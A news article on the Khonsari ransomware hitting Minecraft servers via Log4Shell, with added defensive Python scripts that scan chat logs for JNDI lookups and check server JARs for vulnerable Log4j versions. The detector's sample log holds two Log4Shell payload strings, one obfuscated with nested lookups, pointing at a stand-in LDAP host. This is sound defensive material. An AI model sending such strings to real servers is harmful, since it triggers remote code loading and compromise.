Ransomware “Khonsari” found to be attacking Minecraft servers

news

Microsoft is recommending that administrators of self-hosted Minecraft servers upgrade to the latest release to protect against the Khonsari ransomware attack, which exploits a Log4Shell security vulnerability.

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft

Minecraft administrators running their own servers are encouraged to deploy the latest Minecraft server updates as soon as possible to protect their users. More information can be found here: https://aka.ms/mclog

Mojang Studios, the Swedish game developer behind Minecraft, has announced that it discovered a bug tracked as CVE-2021-44228 in the Apache Log4j Java logging library used by the Java Edition client and multiplayer server, and has released an urgent security update to address it.

At the time, there was no mention of attacks on Minecraft servers using Log4Shell, but Microsoft's security experts in Redmond have since updated their guidance on CVE-2021-44228 to warn of ongoing ransomware exploitation of end-user-hosted Minecraft servers.

In these cases, the adversary sends a malicious in-game message to a vulnerable Minecraft server and exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and any connected vulnerable clients.

Microsoft observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of javaw.exe and demands a ransom for the device.
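The malicious in-game message described above is a Log4j lookup expression that a vulnerable server logs and therefore evaluates. Server operators can spot attempts in their own chat logs before or after patching. The following detector is an added example for this article, not code from Microsoft or Mojang: it assumes the server writes chat to its log in the usual `[HH:MM:SS] [Server thread/INFO]: <player> message` form, folds the nested `${lower:...}`, `${upper:...}` and `${key:-default}` lookups that are used to split the string `jndi` across several expressions, and then flags any message that still contains a `${jndi:` lookup. The sample log lines are constructed for illustration.

```python
"""Detect Log4Shell-style JNDI lookup strings in Minecraft server chat lines.

Added example (not Microsoft's or Mojang's code). Assumes the server log
format shown in CHAT_LINE; SAMPLE_LOG is constructed for illustration.
"""
import re

# Innermost ${...} expression: no nested "${" inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _fold_one(match):
    """Resolve the lookups used to split up the string 'jndi'; leave others as is."""
    body = match.group(1)
    head = body.lower()
    if head.startswith("lower:"):
        return body[len("lower:"):].lower()
    if head.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:  # ${key:-default}: an unknown key yields the default text
        return body.split(":-", 1)[1]
    return match.group(0)  # anything else (including jndi:) stays as written


def normalize(message, max_rounds=20):
    """Collapse nested case/default-value lookups until the text stops changing."""
    for _ in range(max_rounds):
        folded = INNER_LOOKUP.sub(_fold_one, message)
        if folded == message:
            break
        message = folded
    return message


JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
CHAT_LINE = re.compile(r"^\[[\d:]+\] \[[^\]]+\]: <([^>]+)> (.*)$")


def scan_chat_log(lines):
    """Return (line_number, player, normalized_message) for suspicious chat lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = CHAT_LINE.match(line)
        if not m:
            continue
        player, message = m.groups()
        folded = normalize(message)
        if JNDI_LOOKUP.search(folded):
            hits.append((number, player, folded))
    return hits


# Constructed sample: ordinary chat, one plain lookup, one split across lookups.
SAMPLE_LOG = [
    "[10:00:01] [Server thread/INFO]: <alice> anyone up for a raid?",
    "[10:00:05] [Server thread/INFO]: <bob> ${jndi:ldap://example.invalid/x}",
    "[10:00:09] [Server thread/INFO]: <carol> price is ${coins} per stack",
    "[10:00:12] [Server thread/INFO]: <dave> ${${lower:j}ndi:${lower:l}dap://example.invalid/y}",
    "[10:00:15] [Server thread/INFO]: <erin> gg",
]

if __name__ == "__main__":
    for number, player, folded in scan_chat_log(SAMPLE_LOG):
        print(f"line {number}: <{player}> sent a JNDI lookup: {folded}")
```

Run it over `logs/latest.log` (or the rotated `logs/*.log.gz`) of a server; a hit identifies the player name and the folded lookup, which is what an incident ticket needs. Note that folding is for detection only: a hit means the message was a lookup attempt, not that it succeeded, and a server already on the patched release will log the text without evaluating it.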

The Microsoft 365 Defender Threat Intelligence Team and the Microsoft Threat Intelligence Center (MSTIC) have also confirmed that PowerShell-based reverse shells have been deployed in network breaches targeting Minecraft servers, using the Log4j exploit as the entry point.

While Minecraft is not usually installed on corporate endpoints, an attacker who successfully compromises one of these servers could use Mimikatz to steal credentials and maintain access to the compromised system for follow-on activity.

How to protect your Minecraft server from Log4Shell attacks

Microsoft is warning all Minecraft server administrators to install the latest Minecraft server update immediately to protect their servers from these attacks, and is asking players to connect only to trusted Minecraft servers.

If you are hosting your own Minecraft: Java Edition server, please follow the official instructions.

https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition

To upgrade to the patched version, players using Mojang's official client need to close all running games and instances of the Minecraft Launcher, then restart the Launcher, which installs the patch automatically.

If you are using a modified Minecraft client or third party launcher, please contact your third party provider to obtain security updates.
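After applying the server update, it is worth confirming that the server's JAR files no longer carry a vulnerable Log4j 2. The check below is an added example, not Mojang's or Microsoft's tooling. It assumes log4j-core is packaged the way Maven builds it, with a `META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties` entry carrying a `version=` line, and it also looks inside JARs nested within the server JAR, which is how newer server bundles ship their libraries. Versions below 2.16.0 (the release that removed message lookups and disabled JNDI by default, superseding the incomplete 2.15.0 fix) are reported as exposed. The sample JAR it builds is a constructed fixture.

```python
"""Report the Log4j 2 version carried by a Minecraft server JAR (and nested JARs).

Added example (not Mojang's or Microsoft's tooling). Assumes Maven-style
pom.properties metadata inside log4j-core; build_sample_jar() is a constructed
fixture standing in for a real server.jar.
"""
import io
import re
import sys
import zipfile

POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# 2.16.0 removed message lookups and disabled JNDI by default; anything older
# (including the incomplete 2.15.0 fix) is treated as exposed.
SAFE_FROM = (2, 16, 0)


def parse_version(pom_text):
    """Return (major, minor, patch) from a pom.properties 'version=' line, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_text, re.MULTILINE)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_jar(data, location="<root>"):
    """Yield (location, version, has_jndi_lookup) for each log4j-core found."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPERTIES in names:
            text = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
            yield location, parse_version(text), JNDI_LOOKUP_CLASS in names
        for name in sorted(names):
            if name.endswith(".jar"):  # libraries bundled inside the server jar
                yield from inspect_jar(zf.read(name), f"{location}!/{name}")


def findings(data):
    """Summarize every log4j-core in the jar; unknown versions count as exposed."""
    out = []
    for location, version, has_jndi in inspect_jar(data):
        out.append({
            "location": location,
            "version": version,
            "jndi_lookup_class": has_jndi,
            "exposed": version is None or version < SAFE_FROM,
        })
    return out


def build_sample_jar(version="2.14.1"):
    """Constructed fixture: an outer jar bundling a log4j-core of the given version."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM_PROPERTIES,
                   "groupId=org.apache.logging.log4j\n"
                   "artifactId=log4j-core\n"
                   f"version={version}\n")
        z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr(f"META-INF/libraries/log4j-core-{version}.jar", inner.getvalue())
        z.writestr("net/minecraft/server/Main.class", b"\xca\xfe\xba\xbe")
    return outer.getvalue()


if __name__ == "__main__":
    # Usage: python check_log4j.py server.jar  (falls back to the constructed fixture)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_jar()
    for f in findings(data):
        state = "EXPOSED" if f["exposed"] else "ok"
        print(f"{state}: {f['location']} log4j-core {f['version']} "
              f"(JndiLookup present: {f['jndi_lookup_class']})")
```

Point it at `server.jar` and at any plugin or mod JARs the server loads, since those can bundle their own copy of Log4j independently of the Minecraft update. A JAR with no pom.properties at all produces no finding, so an empty report only means nothing Maven-packaged was found, not that the server is clean.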

Khonsari is a wiper

Khonsari, which Bitdefender classified as ransomware, was first discovered being deployed through Log4Shell attacks.

However, Khonsari’s ransom note does not include instructions on how to contact the ransomware operator and pay the ransom.

Emsisoft analyst Brett Callow also pointed out that the ransomware's name does not refer to the attacker: the ransom note carries the contact information of the owner of a Louisiana antique store.

Because the note contains no payment information, this ransomware is better classified as destructive malware, a wiper, that appears to take Minecraft servers down for amusement rather than for profit.
